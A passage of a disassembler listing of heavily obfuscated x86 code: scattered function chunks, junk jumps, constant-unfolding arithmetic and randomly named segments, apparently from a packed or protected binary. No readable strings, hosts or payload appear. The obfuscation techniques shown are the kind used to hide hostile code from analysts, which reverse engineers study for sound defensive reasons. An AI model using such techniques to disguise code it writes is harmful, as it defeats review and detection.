jmp loc_45053A
sub_455F83 endp
; ---------------------------------------------------------------------------
loc_455F8D: ; CODE XREF: ut7h7i2x:loc_443778j
jnz loc_4584B3
jmp loc_451938
; ---------------------------------------------------------------------------
mov ds:dword_43AF9C, eax
; START OF FUNCTION CHUNK FOR sub_449231
loc_455F9D: ; CODE XREF: sub_449231:loc_4461A5j
push offset loc_44C4FB
jmp nullsub_240
; END OF FUNCTION CHUNK FOR sub_449231
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_455FA7: ; CODE XREF: sub_44A3BB-62B4j
jz loc_44DB15
jmp loc_44F88F
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
loc_455FB2: ; CODE XREF: ut7h7i2x:00454D7Dj
push ebx
mov ebx, edx
xchg ebx, [esp]
push offset loc_459D5C
jmp loc_43B410
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_455FC2: ; CODE XREF: sub_43FF65:loc_44BFDCj
push 7BFDB157h
xchg esi, [esp+4+var_4]
mov ebx, esi
pop esi
jmp loc_443970
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
loc_455FD2: ; CODE XREF: ut7h7i2x:0044C0EAj
jnp loc_43B08E
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_455FD8: ; CODE XREF: sub_44E5DC+64CCj
call sub_444374
; END OF FUNCTION CHUNK FOR sub_44E5DC
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_455FDD: ; CODE XREF: sub_43AB62+199BFj
pop eax
rol eax, 1Ah
or eax, 7F14BF53h
add eax, 725DB255h
or eax, 32DC8233h
add eax, 0F1A34C17h
add eax, ebp
jmp loc_43AD1F
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_456000: ; CODE XREF: sub_4565B2:loc_43E847j
pop ecx
rol ecx, 15h
sub ecx, 2A253A26h
and ecx, 0CF95616Dh
add ecx, 0CD38D970h
jmp loc_45AC2E
; END OF FUNCTION CHUNK FOR sub_4565B2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_45601B proc near ; CODE XREF: sub_44339F-4089j
; sub_445D25+7p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043AA49 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F2E3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442E9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445EEA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449E45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F075 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450800 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454D88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457481 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00459A30 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A748 SIZE 00000010 BYTES
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov al, [eax]
jnz loc_457481
jmp loc_455F6A
sub_45601B endp
; ---------------------------------------------------------------------------
cmp eax, edi
jmp loc_44820D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_438. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45603A: ; CODE XREF: ut7h7i2x:0044AB2Aj
jmp locret_454252
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_45603F: ; CODE XREF: sub_444273+2372j
add edx, eax
jmp loc_44BE57
; ---------------------------------------------------------------------------
loc_456046: ; CODE XREF: sub_444273:loc_451A33j
sub al, 99h
push 0AE1CA14Bh
pop edx
or edx, 36779E11h
sub edx, 16AF55EBh
cmp edx, 25B04F0Fh
jmp loc_45704B
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4502F0
loc_456065: ; CODE XREF: sub_4502F0+9j
mov edx, [ebp-8]
loc_456068: ; CODE XREF: sub_4529E0:loc_449258j
mov eax, [ebp-4]
call nullsub_7
pop ecx
jmp loc_43ACD9
; END OF FUNCTION CHUNK FOR sub_4502F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452857
loc_456076: ; CODE XREF: sub_452857+1j
push offset loc_44C784
jmp loc_451E60
; END OF FUNCTION CHUNK FOR sub_452857
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5B0
loc_456080: ; CODE XREF: sub_43B5B0+13j
call sub_453D8B
mov edx, 9E849D81h
call sub_44ED9F
loc_45608F: ; CODE XREF: ut7h7i2x:loc_4564BDj
push edi
push 0F956B11Ch
jmp loc_4594EB
; END OF FUNCTION CHUNK FOR sub_43B5B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6EB
loc_45609A: ; CODE XREF: sub_43E6EB:loc_43AEA9j
add eax, 0B5247B5Eh
call sub_43AED9
mov ds:off_41D028, eax
call sub_44DF67
loc_4560B0: ; CODE XREF: ut7h7i2x:00440142j
push ebp
mov ebp, eax
xchg ebp, [esp+0]
loc_4560B6: ; CODE XREF: ut7h7i2x:0043EB4Aj
mov edx, eax
call sub_43F058
jmp loc_43C070
; END OF FUNCTION CHUNK FOR sub_43E6EB
; ---------------------------------------------------------------------------
loc_4560C2: ; CODE XREF: ut7h7i2x:loc_448B9Ej
; ut7h7i2x:00453F33j
mov eax, [ebp-4]
push edi
mov edi, edx
xchg edi, [esp]
jmp loc_44585E
; ---------------------------------------------------------------------------
loc_4560D0: ; DATA XREF: sub_439BF8+6131o
jnz loc_451C0F
loc_4560D6: ; CODE XREF: ut7h7i2x:loc_4398B9j
jmp loc_44C05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4423C1
loc_4560DB: ; CODE XREF: sub_4423C1:loc_45246Cj
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4560FB
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jnz loc_451C0F
; END OF FUNCTION CHUNK FOR sub_4423C1
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4560FB: ; CODE XREF: sub_439BF8+6121j
; ut7h7i2x:loc_44C05Ej ...
jo loc_457282
jmp loc_43D7A6
; END OF FUNCTION CHUNK FOR sub_439BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_412. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_456107: ; CODE XREF: ut7h7i2x:0044FABDj
jmp loc_43F947
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4563CB
loc_45610C: ; CODE XREF: sub_4563CB-15BE8j
jmp locret_45AA8B
; END OF FUNCTION CHUNK FOR sub_4563CB
; =============== S U B R O U T I N E =======================================
sub_456111 proc near ; CODE XREF: ut7h7i2x:00445852j
; sub_4590CF-D78Fp
; FUNCTION CHUNK AT 00441A83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445817 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D336 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455941 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
add eax, 9DF8123Eh
mov eax, [eax]
jmp loc_445817
sub_456111 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_456122: ; DATA XREF: sub_43F66D+B27Do
mov edx, [esp]
push offset sub_447928
jmp loc_44E91D
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_45612F proc near ; CODE XREF: sub_4433C5+6DEFp
; ut7h7i2x:0044A544j
; FUNCTION CHUNK AT 0043CD75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447510 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045257F SIZE 0000001C BYTES
xchg esi, [esp+0]
pop esi
push esi
push 0AA227335h
pop esi
and esi, ds:4000F0h
or esi, 0B1F089CAh
loc_456146: ; CODE XREF: ut7h7i2x:00452BC6j
add esi, 0DE26033Ch
jmp loc_45257F
sub_45612F endp
; ---------------------------------------------------------------------------
loc_456151: ; CODE XREF: ut7h7i2x:0044E7AAj
mov [edi], ebx
; START OF FUNCTION CHUNK FOR sub_44668A
loc_456153: ; CODE XREF: sub_44668A+8113j
add edx, 5BC99B6Ah
xchg edx, [esp+8+var_8]
jmp sub_43B83C
; END OF FUNCTION CHUNK FOR sub_44668A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_456161: ; CODE XREF: sub_444374:loc_4391BBj
; ut7h7i2x:loc_45A3AAj
jz sub_456B5E
jmp loc_449FA6
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442096
loc_45616C: ; CODE XREF: sub_442096:loc_43F789j
push offset sub_447E42
jmp nullsub_555
; END OF FUNCTION CHUNK FOR sub_442096
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_456176: ; CODE XREF: sub_43C1D2+DFF4j
push esi
; END OF FUNCTION CHUNK FOR sub_43C1D2
; =============== S U B R O U T I N E =======================================
sub_456177 proc near ; CODE XREF: sub_43C1D2:loc_45A47Cj
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A7D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B073 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044826C SIZE 0000000B BYTES
push ebx
mov ebx, ebp
xchg ebx, [esp+4+var_4]
push edi
mov edi, esi
xchg edi, [esp+8+var_8]
push eax
jmp loc_43A7D4
sub_456177 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4506D3
loc_456189: ; CODE XREF: sub_4506D3:loc_44442Fj
jnz loc_444BDA
; END OF FUNCTION CHUNK FOR sub_4506D3
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_45618F: ; CODE XREF: sub_4459EE+F65Bj
jmp nullsub_446
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_456194: ; CODE XREF: sub_444A08-34C5j
jmp loc_454058
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
loc_456199: ; CODE XREF: ut7h7i2x:00439745j
jmp loc_4575B2
; ---------------------------------------------------------------------------
mov [edi], eax
rol ebx, 9
jmp loc_447442
; =============== S U B R O U T I N E =======================================
sub_4561A8 proc near ; CODE XREF: ut7h7i2x:0043C2ACp
; ut7h7i2x:00446DD0j
; FUNCTION CHUNK AT 0045345A SIZE 00000007 BYTES
xchg edi, [esp+0]
pop edi
add eax, ebp
add eax, 0CC5B4CFh
popf
jmp loc_45345A
sub_4561A8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4561BA: ; CODE XREF: ut7h7i2x:0044F8EBj
jns loc_445509
jmp loc_458C76
; ---------------------------------------------------------------------------
loc_4561C5: ; CODE XREF: ut7h7i2x:004398E0j
mov ecx, 5BD89AC5h
; =============== S U B R O U T I N E =======================================
sub_4561CA proc near ; CODE XREF: sub_4456C9p
; FUNCTION CHUNK AT 0044350D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004504D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454EB4 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
jmp loc_44350D
sub_4561CA endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_561. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_4561D5: ; CODE XREF: sub_44F495:loc_447726j
jmp loc_45078F
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456CBD
loc_4561DA: ; CODE XREF: sub_456CBD:loc_456CCCj
cmp dword ptr [ebp-8], 0
jz loc_44B738
jmp loc_4464CA
; END OF FUNCTION CHUNK FOR sub_456CBD
; =============== S U B R O U T I N E =======================================
sub_4561E9 proc near ; DATA XREF: sub_43EF73+194AEo
; FUNCTION CHUNK AT 00452914 SIZE 00000005 BYTES
push 0B9623130h
pop ecx
sub ecx, 0D81FAB4Fh
xor ecx, 0E14285B5h
push offset loc_447396
jmp loc_452914
sub_4561E9 endp
; ---------------------------------------------------------------------------
test eax, 0B6A9B83Ah
jmp loc_44FD4E
; ---------------------------------------------------------------------------
sbb esi, edx
jnp loc_450D69
jmp sub_4555CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_45621D: ; CODE XREF: sub_452D3D:loc_442E11j
; sub_44CEC3+Dj
mov edx, eax
push offset sub_4562F0
jmp loc_445720
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
loc_456229: ; CODE XREF: ut7h7i2x:loc_43AFA0j
jnz loc_459565
jmp loc_43F0FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_456234: ; CODE XREF: sub_447F0A:loc_448147j
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
ror eax, 12h
mov ds:dword_448204, eax
jmp nullsub_250
; END OF FUNCTION CHUNK FOR sub_447F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_456248: ; CODE XREF: sub_444AA3+19j
xor edx, 2FA8EF5Bh
add edx, 3DCC4188h
xchg edx, [esp-4+arg_0]
jmp loc_441DCB
; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_45625C: ; CODE XREF: sub_45292B-156AAj
jz loc_45573E
jmp loc_44746D
; END OF FUNCTION CHUNK FOR sub_45292B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_185. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov [edx], eax
or esi, 7F04FBBEh
jmp sub_445188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_456275: ; CODE XREF: sub_4549F0-1797j
mov [ebp+0], ebx
shr edx, 1Ah
cmp edx, esi
jmp loc_446FDF
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4573BA
loc_456282: ; CODE XREF: sub_4573BA-5116j
pop edi
loc_456283: ; CODE XREF: ut7h7i2x:loc_43D078j
rol edi, 3
add edi, 589EB094h
rol edi, 0Ah
sub edi, 6E18A2Ch
add edi, 96201AE3h
xchg edi, [esp+4+var_4]
jmp loc_445407
; END OF FUNCTION CHUNK FOR sub_4573BA
; ---------------------------------------------------------------------------
mov ecx, 75C48EA5h
jmp loc_43A9E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454277
loc_4562AD: ; CODE XREF: ut7h7i2x:00448ED1j
; sub_454277-A7C0j
rol ebx, 15h
add ebx, 852A3798h
xchg ebx, [esp+10h+var_10]
jmp loc_44321E
; END OF FUNCTION CHUNK FOR sub_454277
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45137D
loc_4562BE: ; CODE XREF: sub_45137D:loc_454E4Aj
sub ebx, 0BB752851h
add ebx, 3A20FECFh
xchg ebx, [esp+0]
jmp loc_44A63E
; END OF FUNCTION CHUNK FOR sub_45137D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BCCB
loc_4562D2: ; CODE XREF: sub_44BCCB+Aj
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
add edx, [ebp-4]
add eax, edx
mov eax, [eax]
add eax, [ebp-4]
mov [ebp-0Ch], eax
jmp loc_451F29
; END OF FUNCTION CHUNK FOR sub_44BCCB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_4562EB: ; CODE XREF: sub_442B3B+1808Bj
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_442B3B
; =============== S U B R O U T I N E =======================================
sub_4562F0 proc near ; DATA XREF: sub_452D3D+34E2o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004497A4 SIZE 00000008 BYTES
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
push 0A8E093C4h
call sub_4475A8
loc_456300: ; CODE XREF: sub_43FA50+1AC3Ej
jmp loc_4497A4
sub_4562F0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_456305: ; CODE XREF: sub_44917B+4E51j
jmp loc_44C380
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C95C
loc_45630A: ; CODE XREF: sub_44C95C+Ej
jmp nullsub_252
; END OF FUNCTION CHUNK FOR sub_44C95C
; ---------------------------------------------------------------------------
loc_45630F: ; CODE XREF: ut7h7i2x:00445D8Aj
jmp loc_45342A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_456314: ; CODE XREF: sub_439B67:loc_4400F3j
mov [ebx], esi
pop edx
jmp loc_450EA7
; END OF FUNCTION CHUNK FOR sub_439B67
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_45631D: ; CODE XREF: sub_44B5CF+A704j
jmp loc_440F71
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
loc_456322: ; CODE XREF: ut7h7i2x:0044868Aj
jmp loc_4412E3
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_456328: ; CODE XREF: ut7h7i2x:00444191j
jmp loc_456CD1
; ---------------------------------------------------------------------------
db 36h, 9Ah, 80h
dword_456330 dd 0 ; DATA XREF: sub_44FB67r
; ---------------------------------------------------------------------------
loc_456334: ; CODE XREF: ut7h7i2x:004557E9j
jmp loc_44C7CE
; ---------------------------------------------------------------------------
loc_456339: ; CODE XREF: ut7h7i2x:0043ED40j
jmp loc_43CF6C
; =============== S U B R O U T I N E =======================================
sub_45633E proc near ; CODE XREF: sub_41764F+52p
; DATA XREF: fabskl8p:off_41D00Co
; FUNCTION CHUNK AT 0043F31B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004412BC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443921 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444052 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004445BC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004458F0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447354 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004487CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450210 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450DE1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00459A93 SIZE 00000015 BYTES
jnz loc_4445BC
mov eax, ds:dword_446810
or eax, eax
jnz loc_452BFC
jmp loc_447354
sub_45633E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_44D497
jmp loc_44F784
; ---------------------------------------------------------------------------
rol eax, 0Ch
jmp sub_44D2FA
; ---------------------------------------------------------------------------
loc_456371: ; CODE XREF: ut7h7i2x:0043E7E1j
ror esi, 12h
sub ecx, ebx
xor ecx, 0B49853C0h
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_45637C: ; CODE XREF: sub_4508DB:loc_43E7D0j
or eax, ds:4000FBh
xor eax, ds:4000FAh
rol eax, 1
xor eax, 76350312h
add eax, ebp
jmp loc_453327
; END OF FUNCTION CHUNK FOR sub_4508DB
; =============== S U B R O U T I N E =======================================
sub_456397 proc near ; CODE XREF: ut7h7i2x:0044B0FAj
; sub_444266+13B6Cp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00448E5F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D993 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004568BD SIZE 00000005 BYTES
xchg ebx, [esp-4+arg_0]
pop ebx
call sub_449700
push ecx
push 0DBAE872Dh
jmp loc_4568BD
sub_456397 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4563AB: ; CODE XREF: ut7h7i2x:004469E1j
add ecx, 0EC4B465Fh
and ecx, 8033B1C8h
xor ecx, 0B0AB3EFDh
add ecx, 0CFAAB856h
xchg ecx, [esp]
jmp sub_43D989
; =============== S U B R O U T I N E =======================================
sub_4563CB proc near ; CODE XREF: sub_44B98B-E835p
; ut7h7i2x:00442399j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004407D0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045610C SIZE 00000005 BYTES
xchg edi, [esp+4+var_4]
pop edi
sub eax, edx
loc_4563D1: ; CODE XREF: ut7h7i2x:0044BB63j
pop edx
jmp loc_4407D0
sub_4563CB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_4563D7: ; CODE XREF: sub_443BC5+7480j
mov edx, [ebp-4]
imul byte ptr [edx]
call sub_447EB5
loc_4563E1: ; CODE XREF: sub_453E14:loc_451FB5j
add ecx, 0A12D3515h
or ecx, 5ACC9D7Ah
xor ecx, 2883F338h
add ecx, ebp
add ecx, 8892B19Dh
loc_4563FB: ; CODE XREF: ut7h7i2x:00447C17j
jmp loc_4402B6
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
sbb ebp, 314A21EEh
jmp sub_44B211
; ---------------------------------------------------------------------------
loc_45640B: ; DATA XREF: sub_442489+6o
xchg edx, [esp]
mov ebx, edx
pop edx
and ebx, 0D644C1E6h
add ebx, 3A0475BBh
xchg ebx, [esp]
jmp loc_458BA6
; ---------------------------------------------------------------------------
loc_456425: ; DATA XREF: sub_44F7F8-15F8Fo
pop edx
jmp loc_4394F2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452AE2
loc_45642B: ; CODE XREF: sub_452AE2:loc_449DE3j
lea eax, [ebp-12Dh]
push ecx
adc ecx, esi
jmp loc_45877F
; END OF FUNCTION CHUNK FOR sub_452AE2
; ---------------------------------------------------------------------------
locret_456439: ; CODE XREF: ut7h7i2x:loc_450082j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_45643A: ; CODE XREF: sub_443C4A+Aj
jmp loc_451611
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
loc_45643F: ; CODE XREF: ut7h7i2x:0043F23Cj
jmp loc_43A9C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_456444: ; CODE XREF: sub_442B3B-7195j
jmp loc_452455
; END OF FUNCTION CHUNK FOR sub_442B3B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_436. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebx
push 6DF7B9B8h
xchg edx, [esp]
mov ebx, edx
jmp loc_452B85
; ---------------------------------------------------------------------------
mov ds:dword_4513A4, eax
call sub_440E38
dec eax
mov edx, ds:dword_4513A4
mov [edx], eax
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_45646D: ; CODE XREF: sub_447F0A-BCFBj
; sub_44EB88+15j
call sub_440E38
mov edx, ds:dword_4513A4
jmp loc_45126F
; END OF FUNCTION CHUNK FOR sub_447F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CD2
loc_45647D: ; CODE XREF: sub_458CD2:loc_4508F7j
cmp edi, ecx
jmp loc_4583D5
; END OF FUNCTION CHUNK FOR sub_458CD2
; ---------------------------------------------------------------------------
loc_456484: ; CODE XREF: ut7h7i2x:loc_4480F2j
push 4
lea eax, [ebp-10h]
push eax
push 7
call sub_440493
push eax
call dword ptr [ebp-4]
test eax, eax
jmp loc_45A4B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_45649C: ; CODE XREF: sub_44B789-1057Fj
pushf
or eax, esi
shr ecx, 15h
loc_4564A2: ; CODE XREF: sub_44B789:loc_4422A9j
mov eax, 0CFF9C25h
call sub_43AED9
add eax, 0E41F5103h
xor eax, 1083C7FFh
jmp loc_45A99C
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
loc_4564BD: ; CODE XREF: ut7h7i2x:00445318j
jno loc_45608F
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4564C3: ; CODE XREF: sub_4462B0:loc_43A3BBj
xor ecx, 16E3F44Ch
add ecx, 62DFA29Ch
loc_4564CF: ; CODE XREF: ut7h7i2x:0044D616j
xor eax, ecx
jmp loc_44B256
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
push esi
push 0EA8D72C3h
pop esi
add esi, 0A2C029C2h
jmp loc_44054E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441C6B
loc_4564E8: ; CODE XREF: sub_441C6B:loc_4415B9j
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov byte ptr [eax], 0
inc dword ptr [ebp-1Ch]
jmp loc_4587B9
; END OF FUNCTION CHUNK FOR sub_441C6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_4564F9: ; CODE XREF: sub_43CE34:loc_44CF84j
inc dword ptr [ebp-1Ch]
jmp loc_440326
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_456501: ; CODE XREF: sub_459653-20420j
; sub_454361j
inc dword ptr [ebp-18h]
jmp loc_459907
; END OF FUNCTION CHUNK FOR sub_459653
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_456509: ; CODE XREF: sub_452653:loc_43B3BAj
; sub_442B3B+72j ...
call sub_453D8B
mov edx, 9E849D81h
push esi
push 4B838A69h
jmp loc_44CE85
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44469C
loc_45651E: ; CODE XREF: sub_44469C+9j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_44469C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_456520 proc near ; CODE XREF: sub_44E3D4-12443j
; sub_44445F-5A1Ap ...
push ebp
mov ebp, esp
push esi
mov esi, ecx
jmp loc_44D1BF
sub_456520 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583C4
loc_45652B: ; CODE XREF: sub_4583C4:loc_451F2Ej
xor ecx, 0BD48768Ch
add ecx, 994479A6h
xchg ecx, [esp+4+var_4]
jmp loc_44E5D2
; END OF FUNCTION CHUNK FOR sub_4583C4
; ---------------------------------------------------------------------------
loc_45653F: ; CODE XREF: ut7h7i2x:0044ACA3j
mov eax, 510AEA73h
push ecx
mov ecx, edi
xchg ecx, [esp]
push 0C077CA0Dh
pop edi
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_456550: ; CODE XREF: sub_43C9F5:loc_43CA0Cj
add edi, 0DD919A3Dh
rol edi, 19h
jmp loc_44C945
; END OF FUNCTION CHUNK FOR sub_43C9F5
; ---------------------------------------------------------------------------
loc_45655E: ; CODE XREF: ut7h7i2x:00446AABj
call sub_4590CF
loc_456563: ; CODE XREF: ut7h7i2x:0044D4F2j
jmp sub_44F7F8
; ---------------------------------------------------------------------------
loc_456568: ; CODE XREF: ut7h7i2x:0044AEFDj
jmp loc_43CC80
; ---------------------------------------------------------------------------
loc_45656D: ; CODE XREF: ut7h7i2x:0044BE19j
add ecx, 8BF906D0h
loc_456573: ; CODE XREF: ut7h7i2x:0044558Dj
xor ecx, 24B0FA52h
add ecx, 0DF616D31h
mov [ecx], eax
pop ecx
lea eax, sub_450087
mov byte ptr [eax], 0C3h
jmp loc_454444
; =============== S U B R O U T I N E =======================================
sub_456590 proc near ; CODE XREF: sub_41A1E5+3Bp
; sub_43DDEF+9j
; DATA XREF: ...
; FUNCTION CHUNK AT 004498AB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004543C9 SIZE 00000008 BYTES
call sub_43DDEF
loc_456595: ; CODE XREF: sub_45066E+7j
jmp loc_4498AB
sub_456590 endp
; =============== S U B R O U T I N E =======================================
sub_45659A proc near ; DATA XREF: sub_44D759-F86Ao
mov [ebp+eax-100h], dl
inc dword ptr [ebp-108h]
inc dword ptr [ebp-104h]
jmp loc_4573AA
sub_45659A endp
; =============== S U B R O U T I N E =======================================
sub_4565B2 proc near ; CODE XREF: sub_4462B0:loc_442A76p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043E847 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004423D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442AA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044363A SIZE 00000013 BYTES
